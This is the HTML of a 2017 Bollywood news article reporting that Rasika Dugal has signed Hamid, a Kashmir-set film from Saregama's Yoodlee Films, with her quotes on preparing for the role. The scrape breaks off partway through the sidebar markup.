        <div class="td-crumb-container"><div class="entry-crumbs"><span><a title="" class="entry-crumb" href="https://businessofcinema.com/">Home</a></span> <i class="td-icon-right td-bread-sep"></i> <span><a title="View all posts in BOLLYWOOD" class="entry-crumb" href="https://businessofcinema.com/category/bollywood_news">BOLLYWOOD</a></span> <i class="td-icon-right td-bread-sep td-bred-no-url-last"></i> <span class="td-bred-no-url-last">After Manto Actor Rasika Dugal Signs Hamid, Saregama&#8217;s Next Under Yoodlee Films</span></div></div>

        <div class="td-pb-row">
                                    <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-414072" class="post-414072 post type-post status-publish format-standard has-post-thumbnail hentry category-bollywood_news tag-bollywood tag-nawazuddin-siddique tag-rasika-dugal tag-saregama tag-yoodlee-films" itemscope itemtype="https://schema.org/Article">
        <div class="td-post-header">

            <ul class="td-category"><li class="entry-category"><a  href="https://businessofcinema.com/category/bollywood_news">BOLLYWOOD</a></li></ul>
            <header class="td-post-title">
                <h1 class="entry-title">After Manto Actor Rasika Dugal Signs Hamid, Saregama&#8217;s Next Under Yoodlee Films</h1>

                

                <div class="td-module-meta-info">
                    <div class="td-post-author-name"><div class="td-author-by">By</div> <a href="https://businessofcinema.com/author/businessofcinema-news-network">BusinessofCinema News Network</a><div class="td-author-line"> - </div> </div>                    <span class="td-post-date td-post-date-no-dot"><time class="entry-date updated td-module-date" datetime="2017-10-12T14:24:14+00:00" >2017/10/12</time></span>                                                        </div>

            </header>

        </div>

        <div class="td-post-sharing td-post-sharing-top td-with-like">
				<div class="td-default-sharing">
		            <a class="td-social-sharing-buttons td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fbusinessofcinema.com%2Fbollywood_news%2Fmanto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films%2F414072" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Share on Facebook</div></a>
		            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=After+Manto+Actor+Rasika+Dugal+Signs+Hamid%2C+Saregama%E2%80%99s+Next+Under+Yoodlee+Films&url=https%3A%2F%2Fbusinessofcinema.com%2Fbollywood_news%2Fmanto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films%2F414072&via=boclive"  ><i class="td-icon-twitter"></i><div class="td-social-but-text">Tweet on Twitter</div></a>
		            <a class="td-social-sharing-buttons td-social-google" href="https://plus.google.com/share?url=https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
		            <a class="td-social-sharing-buttons td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072&amp;media=https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/06/Rasika-Dugal.jpg&description=After%2BManto%2BActor%2BRasika%2BDugal%2BSigns%2BHamid%2C%2BSaregama%E2%80%99s%2BNext%2BUnder%2BYoodlee%2BFilms" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
		            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=After+Manto+Actor+Rasika+Dugal+Signs+Hamid%2C+Saregama%E2%80%99s+Next+Under+Yoodlee+Films%20-%20https%3A%2F%2Fbusinessofcinema.com%2Fbollywood_news%2Fmanto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films%2F414072" ><i class="td-icon-whatsapp"></i></a>
	            </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="https://www.facebook.com/plugins/like.php?href=https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072" data-text="After Manto Actor Rasika Dugal Signs Hamid, Saregama&#8217;s Next Under Yoodlee Films" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div>

        <div class="td-post-content">

        <div class="td-post-featured-image"><img width="620" height="400" class="entry-thumb" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/06/Rasika-Dugal.jpg" srcset="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/06/Rasika-Dugal.jpg 620w, https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/06/Rasika-Dugal-300x194.jpg 300w" sizes="(max-width: 620px) 100vw, 620px" alt="Rasika Dugal Excels In Large Short Films 'The School Bag'" title="Rasika-Dugal"/></div>
        
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-content_top td_uid_3_59df5652ecdc1_rand td_block_template_1 ">
<script type="text/javascript">
var td_screen_width = window.innerWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3452818097917548" data-ad-slot="7261220312"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3452818097917548" data-ad-slot="7261220312"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3452818097917548" data-ad-slot="7261220312"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-3452818097917548" data-ad-slot="7261220312"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

<aside class="mashsb-container mashsb-main mashsb-stretched"><div class="mashsb-box"><div class="mashsb-count" style="float:left;"><div class="counts mashsbcount">0</div><span class="mashsb-sharetext">SHARES</span></div><div class="mashsb-buttons"><a  class="mashicon-facebook mash-center mashsb-noshadow" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fbusinessofcinema.com%2Fbollywood_news%2Fmanto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films%2F414072" target="_blank" rel="nofollow"><span class="icon"></span><span class="text">Share</span></a><a  class="mashicon-twitter mash-center mashsb-noshadow" href="https://twitter.com/intent/tweet?text=After%20Manto%20Actor%20Rasika%20Dugal%20Signs%20Hamid%2C%20Saregama%E2%80%99s%20Next%20Under%20Yoodlee%20Films&url=https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072" target="_blank" rel="nofollow"><span class="icon"></span><span class="text">Tweet</span></a><div class="onoffswitch2 mashsb-noshadow" style="display:none;"></div></div>
            </div>
                <div style="clear:both;"></div></aside>
            <!-- Share buttons by mashshare.net - Version: 3.4.5--><!-- WhatsApp Share Button for WordPress: http://peadig.com/wordpress-plugins/whatsapp-share-button/ --><div class="wabtn_container"><a href="whatsapp://send?text=After Manto Actor Rasika Dugal Signs Hamid, Saregama&#8217;s Next Under Yoodlee Films - https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072?utm_source=WhatsApp%26utm_medium=IM%26amp;utm_campaign=share%20button" class="wabtn">Share this on WhatsApp</a></div><div class="td-a-rec td-a-rec-id-content_inlineleft  td_uid_2_59df5652ecbd8_rand td_block_template_1"><div class="td-all-devices">
<!--300x250 article top advt with no back-->
<script type="text/javascript">
Criteo.DisplayAd({
    "zoneid": 191500,
    "async": false});
</script>
</div></div><p>Rasika Dugal who will soon be seen essaying the role of Safia Manto in Nandita Das&#8217; Manto with Nawazuddin Siddique is now all set to take on yet another challenging role in a new film titled Hamid which is being produced by Saregama&#8217;s new film production arm, Yoodlee Films. The film being directed by Aijaz Khan is a heart warming tale of a relationship between a widowed mother and a young son who loses his father in the unrest set in the backdrop of Kashmir.</p>
<p><em><strong><a href="http://businessofcinema.com/"><span class="im">Click Here For All Latest Bollywood News</span></a></strong></em></p>
<p>The film deals and tells the plight of the current scenario of Kashmir and its impact on the people who live there. The film has been shot in Kashmir including Srinagar and Baramula. Speaking about the film, Rasika said,<em> &#8220;What really appealed to me about the film was how it has shown the human side to the current plight and given the snapshot into the scenario using a very personal story instead of making it political. Aijaz has been in discussion to work with me for a long time and finally when this script came to me, I was glad to work on it&#8221;.</em></p>
<p>Adding further about her prep for role, she said, <em>&#8220;I watched a lot of videos to prep myself. There was a lot of video material to understand the situation from a different perspective. I came across the work of this lady by the name of Parveena Ahangar who runs an organisation which helps Kashmiris find missing people. She herself lost her 17 year son who was picked up by militants in middle of the night. I also stumbled upon this documentary by Iffat Fatima which really gave me a very deep insight into the plight of the people of Kashmir&#8221;</em></p>
<p><em><strong>Watch Video : Ranbir Kapoor, Arjun Kapoor And Aditya Roy Kapur Snapped At Blade Runner Screening</strong></em></p>
<p><iframe src="https://www.youtube.com/embed/pNb2faWTmZs" width="560" height="315" frameborder="0" allowfullscreen="allowfullscreen"></iframe></p>
<p><span itemprop="video" itemscope itemtype="http://schema.org/VideoObject"><meta itemprop="name" content="After Manto Actor Rasika Dugal Signs Hamid, Saregama&#8217;s Next Under Yoodlee Films" /><meta itemprop="thumbnailUrl" content="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/10/pnb2fawtmzs.jpg" /><meta itemprop="description" content="Rasika Dugal who will soon be seen essaying the role of Safia Manto in Nandita Das&#039; Manto with Nawazuddin Siddique is now all set." /><meta itemprop="uploadDate" content="2017-10-12T14:24:14+00:00" /><meta itemprop="embedUrl" content="https://www.youtube.com/embed/pNb2faWTmZs" /><meta itemprop="duration" content="PT3M11S" /><meta itemprop="isFamilyFriendly" content="true" /></span></p>
<!-- WhatsApp Share Button for WordPress: http://peadig.com/wordpress-plugins/whatsapp-share-button/ --><div class="wabtn_container"><a href="whatsapp://send?text=After Manto Actor Rasika Dugal Signs Hamid, Saregama&#8217;s Next Under Yoodlee Films - https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072?utm_source=WhatsApp%26utm_medium=IM%26amp;utm_campaign=share%20button" class="wabtn">Share this on WhatsApp</a></div>
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-content_bottom td_uid_4_59df5652ecfb2_rand td_block_template_1 ">
<script type="text/javascript">
var td_screen_width = window.innerWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3452818097917548" data-ad-slot="1214686716"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3452818097917548" data-ad-slot="1214686716"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3452818097917548" data-ad-slot="1214686716"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-3452818097917548" data-ad-slot="1214686716"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

        </div>


        <footer>
                        
            <div class="td-post-source-tags">
                                <ul class="td-tags td-post-small-box clearfix"><li><span>TAGS</span></li><li><a href="https://businessofcinema.com/tag/bollywood">bollywood</a></li><li><a href="https://businessofcinema.com/tag/nawazuddin-siddique">Nawazuddin Siddique</a></li><li><a href="https://businessofcinema.com/tag/rasika-dugal">Rasika Dugal</a></li><li><a href="https://businessofcinema.com/tag/saregama">saregama</a></li><li><a href="https://businessofcinema.com/tag/yoodlee-films">yoodlee films</a></li></ul>            </div>

            <div class="td-post-sharing td-post-sharing-bottom td-with-like"><span class="td-post-share-title">SHARE</span>
            <div class="td-default-sharing">
	            <a class="td-social-sharing-buttons td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fbusinessofcinema.com%2Fbollywood_news%2Fmanto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films%2F414072" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a>
	            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=After+Manto+Actor+Rasika+Dugal+Signs+Hamid%2C+Saregama%E2%80%99s+Next+Under+Yoodlee+Films&url=https%3A%2F%2Fbusinessofcinema.com%2Fbollywood_news%2Fmanto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films%2F414072&via=boclive"><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a>
	            <a class="td-social-sharing-buttons td-social-google" href="https://plus.google.com/share?url=https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
	            <a class="td-social-sharing-buttons td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072&amp;media=https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/06/Rasika-Dugal.jpg&description=After%2BManto%2BActor%2BRasika%2BDugal%2BSigns%2BHamid%2C%2BSaregama%E2%80%99s%2BNext%2BUnder%2BYoodlee%2BFilms" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
	            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=After+Manto+Actor+Rasika+Dugal+Signs+Hamid%2C+Saregama%E2%80%99s+Next+Under+Yoodlee+Films%20-%20https%3A%2F%2Fbusinessofcinema.com%2Fbollywood_news%2Fmanto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films%2F414072" ><i class="td-icon-whatsapp"></i></a>
            </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="https://www.facebook.com/plugins/like.php?href=https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072" data-text="After Manto Actor Rasika Dugal Signs Hamid, Saregama&#8217;s Next Under Yoodlee Films" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div>            <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Previous article</span><a href="https://businessofcinema.com/tele/splitsvilla-10-not-priyank-sharma-divya-agarwal-couple-wins-show/414064">Splitsvilla 10: Not Priyank Sharma And Divya Agarwal But This Couple Wins The Show!</a></div></div><div class="td-next-prev-separator"></div><div class="td-block-span6 td-post-next-post"><div class="td-post-next-prev-content"><span>Next article</span><a href="https://businessofcinema.com/bollywood_news/revealed-deepika-padukone-ranveer-singh-shahid-kapoor-get-whopping-pay-cheque-padmavati/414075">REVEALED: Deepika Padukone, Ranveer Singh, Shahid Kapoor Get Whopping Pay Cheque For Padmavati!</a></div></div></div>            <div class="td-author-name vcard author" style="display: none"><span class="fn"><a href="https://businessofcinema.com/author/businessofcinema-news-network">BusinessofCinema News Network</a></span></div>	        <span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="BusinessofCinema News Network"></span><meta itemprop="datePublished" content="2017-10-12T14:24:14+00:00"><meta itemprop="dateModified" content="2017-10-12T14:24:14+00:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://businessofcinema.com/bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072"/><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2016/08/BOC400.png"></span><meta itemprop="name" content="Businessofcinema.com"></span><meta itemprop="headline " content="After Manto Actor Rasika Dugal Signs Hamid, Saregama&#039;s Next Under Yoodlee Films"><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/06/Rasika-Dugal.jpg"><meta itemprop="width" content="620"><meta itemprop="height" content="400"></span>	        <div class="OUTBRAIN" data-src="//businessofcinema.com//bollywood_news/manto-actor-rasika-dugal-signs-hamid-saregamas-next-yoodlee-films/414072" data-widget-id="AR_2" data-ob-template="BusinessOfCinema"></div>
<script type="text/javascript" async="async" src="//widgets.outbrain.com/outbrain.js"></script>

	        <!-- Facebook Comments Plugin for WordPress: http://peadig.com/wordpress-plugins/facebook-comments/ --><h3>Comments</h3><p><fb:comments-count href=></fb:comments-count> comments!</p><div class="fb-comments" data-href="" data-numposts="5" data-width="100%" data-colorscheme="light"></div>        </footer>

    </article> <!-- /.post -->

    <div class="td_block_wrap td_block_related_posts td_uid_5_59df5652f2110_rand td_with_ajax_pagination td-pb-border-top td_block_template_1"  data-td-block-uid="td_uid_5_59df5652f2110" ><script>var block_td_uid_5_59df5652f2110 = new tdBlock();
block_td_uid_5_59df5652f2110.id = "td_uid_5_59df5652f2110";
block_td_uid_5_59df5652f2110.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_custom_related","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_5_59df5652f2110_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_5_59df5652f2110_rand","tdc_css_class_style":"td_uid_5_59df5652f2110_rand_style","live_filter":"cur_post_same_tags","live_filter_cur_post_id":414072,"live_filter_cur_post_author":"376","block_template_id":""}';
block_td_uid_5_59df5652f2110.td_column_number = "3";
block_td_uid_5_59df5652f2110.block_type = "td_block_related_posts";
block_td_uid_5_59df5652f2110.post_count = "3";
block_td_uid_5_59df5652f2110.found_posts = "22304";
block_td_uid_5_59df5652f2110.header_color = "";
block_td_uid_5_59df5652f2110.ajax_pagination_infinite_stop = "";
block_td_uid_5_59df5652f2110.max_num_pages = "7435";
tdBlocksArray.push(block_td_uid_5_59df5652f2110);
</script><h4 class="td-related-title td-block-title"><a id="td_uid_6_59df565365b1d" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_5_59df5652f2110" href="#">RELATED ARTICLES</a><a id="td_uid_7_59df565365b75" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_5_59df5652f2110" href="#">MORE FROM AUTHOR</a></h4><div id=td_uid_5_59df5652f2110 class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://businessofcinema.com/bollywood_news/heres-amitabh-bachchan-opted-salman-khan-starrer-race-3/414097" rel="bookmark" title="Here’s Why Amitabh Bachchan Opted Out Of Salman Khan Starrer Race 3!"><img width="218" height="150" class="entry-thumb" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/10/salman-khan-amitabh-bachchan-218x150.jpg" srcset="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/10/salman-khan-amitabh-bachchan-218x150.jpg 218w, https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/10/salman-khan-amitabh-bachchan-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="salman khan amitabh bachchan" title="Here’s Why Amitabh Bachchan Opted Out Of Salman Khan Starrer Race 3!"/></a></div>                <a href="https://businessofcinema.com/category/bollywood_news" class="td-post-category">BOLLYWOOD</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://businessofcinema.com/bollywood_news/heres-amitabh-bachchan-opted-salman-khan-starrer-race-3/414097" rel="bookmark" title="Here’s Why Amitabh Bachchan Opted Out Of Salman Khan Starrer Race 3!">Here’s Why Amitabh Bachchan Opted Out Of Salman Khan Starrer Race 3!</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://businessofcinema.com/bollywood_news/juno-chopra-celebrates-wrap-upcoming-film-ittefaq/414089" rel="bookmark" title="Juno Chopra Celebrates The Wrap Of His Upcoming Film Ittefaq"><img width="218" height="150" class="entry-thumb" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/10/ittefaq-218x150.jpg" srcset="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/10/ittefaq-218x150.jpg 218w, https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/10/ittefaq-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="ittefaq" title="Juno Chopra Celebrates The Wrap Of His Upcoming Film Ittefaq"/></a></div>                <a href="https://businessofcinema.com/category/bollywood_news" class="td-post-category">BOLLYWOOD</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://businessofcinema.com/bollywood_news/juno-chopra-celebrates-wrap-upcoming-film-ittefaq/414089" rel="bookmark" title="Juno Chopra Celebrates The Wrap Of His Upcoming Film Ittefaq">Juno Chopra Celebrates The Wrap Of His Upcoming Film Ittefaq</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://businessofcinema.com/bollywood_news/see-photos-amitabh-bachchan-celebrating-75th-birthday/414092" rel="bookmark" title="See Photos: This Is How Amitabh Bachchan Is Celebrating His 75th Birthday!"><img width="218" height="150" class="entry-thumb" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/10/amitabh-bachchan--218x150.jpg" srcset="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/10/amitabh-bachchan--218x150.jpg 218w, https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/10/amitabh-bachchan--100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="amitabh bachchan" title="See Photos: This Is How Amitabh Bachchan Is Celebrating His 75th Birthday!"/></a></div>                <a href="https://businessofcinema.com/category/bollywood_news" class="td-post-category">BOLLYWOOD</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://businessofcinema.com/bollywood_news/see-photos-amitabh-bachchan-celebrating-75th-birthday/414092" rel="bookmark" title="See Photos: This Is How Amitabh Bachchan Is Celebrating His 75th Birthday!">See Photos: This Is How Amitabh Bachchan Is Celebrating His 75th Birthday!</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_5_59df5652f2110" data-td_block_id="td_uid_5_59df5652f2110"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_5_59df5652f2110" data-td_block_id="td_uid_5_59df5652f2110"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->
                            </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <aside class="widget_text td_block_template_1 widget widget_custom_html"><h4 class="block-title"><span>Like us on FB</span></h4><div class="textwidget custom-html-widget"><script>
					(function (d, s, id) {
						var js, fjs = d.getElementsByTagName(s)[0];
						if (d.getElementById(id)) return;
						js = d.createElement(s);
						js.id = id;
						js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.5";
						fjs.parentNode.insertBefore(js, fjs);
					}(document, 'script', 'facebook-jssdk'));
					// After FB Page plugin is loaded, the height of its container changes.
					// We need to notify theme about that so elements like eg. sticky widgets can react
					(function (object) {
						object.addEventListener('load', function () {
							FB.Event.subscribe('xfbml.render', function () {
								jQuery('body').trigger('g1PageHeightChanged');
							});
						});
					})(window);
				</script>
				<div class="fb-page"
				     data-href="https://www.facebook.com/businessofcinema"
				     data-adapt-container-width="true"
				     data-small-header="true"
				     data-hide-cover="false"
				     data-show-facepile="true"
				     data-show-posts="false">
				</div></div></aside><div class="td-a-rec td-a-rec-id-sidebar  td_uid_8_59df56536c3c2_rand td_block_template_1"><div class="td-all-devices">
<!-- 300 x 250 Below Menu with no back-->
<script type="text/javascript">
Criteo.DisplayAd({
    "zoneid": 171845,
    "async": false});
</script>
</div></div><div class="td_block_wrap td_block_slide td_block_widget td_uid_9_59df56536c84e_rand td-pb-border-top td_block_template_1"  data-td-block-uid="td_uid_9_59df56536c84e" ><script>var block_td_uid_9_59df56536c84e = new tdBlock();
block_td_uid_9_59df56536c84e.id = "td_uid_9_59df56536c84e";
block_td_uid_9_59df56536c84e.atts = '{"limit":"5","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"Trending ","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_9_59df56536c84e_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_9_59df56536c84e_rand","tdc_css_class_style":"td_uid_9_59df56536c84e_rand_style","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_9_59df56536c84e.td_column_number = "1";
block_td_uid_9_59df56536c84e.block_type = "td_block_slide";
block_td_uid_9_59df56536c84e.post_count = "5";
block_td_uid_9_59df56536c84e.found_posts = "59511";
block_td_uid_9_59df56536c84e.header_color = "#";
block_td_uid_9_59df56536c84e.ajax_pagination_infinite_stop = "";
block_td_uid_9_59df56536c84e.max_num_pages = "11903";
tdBlocksArray.push(block_td_uid_9_59df56536c84e);
</script><div class="td-block-title-wrap"><h4 class="block-title"><span class="td-pulldown-size">Trending </span></h4></div><div id=td_uid_9_59df56536c84e class="td_block_inner"><div id="td_uid_10_59df5653ebfa3" class="td-theme-slider iosSlider-col-1 td_mod_wrap"><div class="td-slider "><div id="td_uid_10_59df5653ebfa3_item_0" class = "td_module_slide td-animation-stack td-image-gradient"><div class="td-module-thumb"><a href="https://businessofcinema.com/bollywood_news/heres-amitabh-bachchan-opted-salman-khan-starrer-race-3/414097" rel="bookmark" title="Here’s Why Amitabh Bachchan Opted Out Of Salman Khan Starrer Race 3!"><img width="324" height="400" class="entry-thumb" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/10/salman-khan-amitabh-bachchan-324x400.jpg" alt="salman khan amitabh bachchan" title="Here’s Why Amitabh Bachchan Opted Out Of Salman Khan Starrer Race 3!"/></a></div><div class="td-slide-meta"><span class="slide-meta-cat"><a href="https://businessofcinema.com/category/bollywood_news">BOLLYWOOD</a></span><h3 